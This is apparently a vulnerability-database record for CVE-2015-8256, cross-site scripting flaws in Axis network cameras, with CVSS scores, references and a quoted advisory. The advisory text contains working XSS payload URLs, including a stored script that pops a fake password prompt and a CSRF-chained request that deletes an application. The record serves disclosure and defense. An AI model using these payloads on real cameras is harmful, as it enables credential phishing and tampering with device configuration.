Sign-up

ID

VAR-201704-0284


CVE

CVE-2015-8256


TITLE

AXIS Network camera cross-site scripting vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2015-007530

DESCRIPTION

Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML. I. technical details ----------------- ** STORED XSS # 1 Attacker injects a javascript payload in the vulnerable page (using some social enginner aproach): http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script type="text/javascript>prompt("AXIS_PASSWORD:")</script> This will generate an error like this on page: " Error processing XML: Incorrect formatting line number 2, column 60: <error type = "No_such_application" message = "No application" '<script type="text/javascript>prompt("AXIS_PASSWORD:")</script>' ----------------------------------------------------------------^ " and also will create a entry in the genneral log file (/var/log/messages) with the JSPayload: " <INFO > Apr 11 10:08:45 axis-eac8c03d901 vaconfig.cgi: Could not find application '<script type="text/javascript>prompt("AXIS_PASSWORD:")</script>' " When the user is viewing the log 'system options' -> 'support' -> 'Logs & Reports': http://{axishost}/axis-cgi/admin/systemlog.cgi?id the JSPayload will be interpreted by the browser and the Javascript prompt method will be executed showing a prompt asking user for the password ('AXIS_PASSWORD'). * With this vector an attacker is able to perfome many attacks using javascript, for example to hook users browser, capture users cookie, performe pishing attacks etc. However, due to CSRF presented is even possible to perform all actions already presented: create, edit and remove users and applications, etc. For example, to delete an application "axis_update" via SXSS: http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script src="http:// axishost/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml"></script> A reflected cross-site scripting affects all models of AXIS devices on the same parameter: http:// {axis-cam-model}/view/view.shtml?imagePath=0WLL</script><script>alert('AXIS-XSS')</script><!-- # Other Vectors http:// {axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E http://{axishost}/view/custom_whiteBalance.shtml?imagePath=<img src="xs" onerror=alert(7) /><!-- http://{axishost}/admin-bin/editcgi.cgi?file=<script>alert(1)</script> http:// {axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E http:// {axishost}/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle=axis</title></head><body><pre><script>alert(1)</script> # SCRIPTPATHS: {HTMLROOT}/showReport.shtml {HTMLROOT}/config.shtml {HTMLROOT}/incl/top_incl.shtml {HTMLROOT}/incl/popup_header.shtml {HTMLROOT}/incl/page_header.shtml {HTMLROOT}/incl/top_incl_popup.shtml {HTMLROOT}/viewAreas.shtml {HTMLROOT}/vmd.shtml {HTMLROOT}/custom_whiteBalance.shtml {HTMLROOT}/playWindow.shtml {HTMLROOT}/incl/ptz_incl.shtml {HTMLROOT}/view.shtml {HTMLROOT}/streampreview.shtml Impact ------ allows to run arbitrary code on a victim's browser and computer if combined with another flaws in the same devices. solution -------- It was not provided any solution to the problem. Credits ------- The vulnerability has been discovered by SmithW from OrwellLabs Legal Notices ----------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. About Orwelllabs ++++++++++++++++ doublethinking..

Trust: 2.07

sources: NVD: CVE-2015-8256 // JVNDB: JVNDB-2015-007530 // BID: 97699 // VULHUB: VHN-86217 // PACKETSTORM: 141674

AFFECTED PRODUCTS

vendor:axismodel:network camerascope:eqversion: -

Trust: 1.6

vendor:axismodel:network camerascope: - version: -

Trust: 0.8

vendor:axismodel:communications network camerasscope:eqversion:0

Trust: 0.3

sources: BID: 97699 // JVNDB: JVNDB-2015-007530 // CNNVD: CNNVD-201704-863 // NVD: CVE-2015-8256

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2015-8256
value: MEDIUM

Trust: 1.0

NVD: CVE-2015-8256
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-201704-863
value: MEDIUM

Trust: 0.6

VULHUB: VHN-86217
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2015-8256
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-86217
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2015-8256
baseSeverity: MEDIUM
baseScore: 6.1
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.8
impactScore: 2.7
version: 3.0

Trust: 1.8

sources: VULHUB: VHN-86217 // JVNDB: JVNDB-2015-007530 // CNNVD: CNNVD-201704-863 // NVD: CVE-2015-8256

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.1

sources: VULHUB: VHN-86217 // NVD: CVE-2015-8256

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201704-863

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 141674 // CNNVD: CNNVD-201704-863

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2015-007530

EXPLOIT AVAILABILITY
sources:
            
            
            VULHUB: VHN-86217

PATCH
title:ネットワーク カメラurl:https://www.axis.com/ja/techsup/cam_servers/index.htm
Trust: 0.8
sources:
            
            
            JVNDB: JVNDB-2015-007530

EXTERNAL IDS
db:NVDid:CVE-2015-8256
Trust: 2.9
db:PACKETSTORMid:141674
Trust: 2.6
db:EXPLOIT-DBid:39683
Trust: 1.7
db:BIDid:97699
Trust: 1.4
db:JVNDBid:JVNDB-2015-007530
Trust: 0.8
db:CNNVDid:CNNVD-201704-863
Trust: 0.7
db:SEEBUGid:SSVID-91665
Trust: 0.1
db:VULHUBid:VHN-86217
Trust: 0.1
sources:
            
            
            VULHUB: VHN-86217 // 
            
            
            
            BID: 97699 // 
            
            
            
            JVNDB: JVNDB-2015-007530 // 
            
            
            
            PACKETSTORM: 141674 // 
            
            
            
            CNNVD: CNNVD-201704-863 // 
            
            
            
            NVD: CVE-2015-8256

REFERENCES
url:http://packetstormsecurity.com/files/141674/axis-network-camera-cross-site-scripting.html
Trust: 2.5
url:https://www.exploit-db.com/exploits/39683/
Trust: 1.7
url:http://www.securityfocus.com/bid/97699
Trust: 1.1
url:https://nvd.nist.gov/vuln/detail/cve-2015-8256
Trust: 0.9
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8256
Trust: 0.8
url:https://www.axis.com/in/en/
Trust: 0.3
url:http://{axishost}/admin-bin/editcgi.cgi?file=<script>alert(1)</script>
Trust: 0.1
url:http://{axishost}/axis-cgi/admin/systemlog.cgi?id
Trust: 0.1
url:http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script
Trust: 0.1
url:http://{axishost}/view/custom_whitebalance.shtml?imagepath=<img
Trust: 0.1
sources:
            
            
            VULHUB: VHN-86217 // 
            
            
            
            BID: 97699 // 
            
            
            
            JVNDB: JVNDB-2015-007530 // 
            
            
            
            PACKETSTORM: 141674 // 
            
            
            
            CNNVD: CNNVD-201704-863 // 
            
            
            
            NVD: CVE-2015-8256

CREDITS
SmithW from OrwellLabs
Trust: 0.3
sources:
            
            
            BID: 97699

SOURCES
db:VULHUBid:VHN-86217
db:BIDid:97699
db:JVNDBid:JVNDB-2015-007530
db:PACKETSTORMid:141674
db:CNNVDid:CNNVD-201704-863
db:NVDid:CVE-2015-8256

LAST UPDATE DATE
2025-04-20T23:29:43.640000+00:00

SOURCES UPDATE DATE
db:VULHUBid:VHN-86217date:2017-04-25T00:00:00
db:BIDid:97699date:2017-04-18T00:07:00
db:JVNDBid:JVNDB-2015-007530date:2017-05-19T00:00:00
db:CNNVDid:CNNVD-201704-863date:2017-04-25T00:00:00
db:NVDid:CVE-2015-8256date:2025-04-20T01:37:25.860

SOURCES RELEASE DATE
db:VULHUBid:VHN-86217date:2017-04-17T00:00:00
db:BIDid:97699date:2017-04-17T00:00:00
db:JVNDBid:JVNDB-2015-007530date:2017-05-19T00:00:00
db:PACKETSTORMid:141674date:2017-03-17T00:08:43
db:CNNVDid:CNNVD-201704-863date:2017-04-25T00:00:00
db:NVDid:CVE-2015-8256date:2017-04-17T16:59:00.150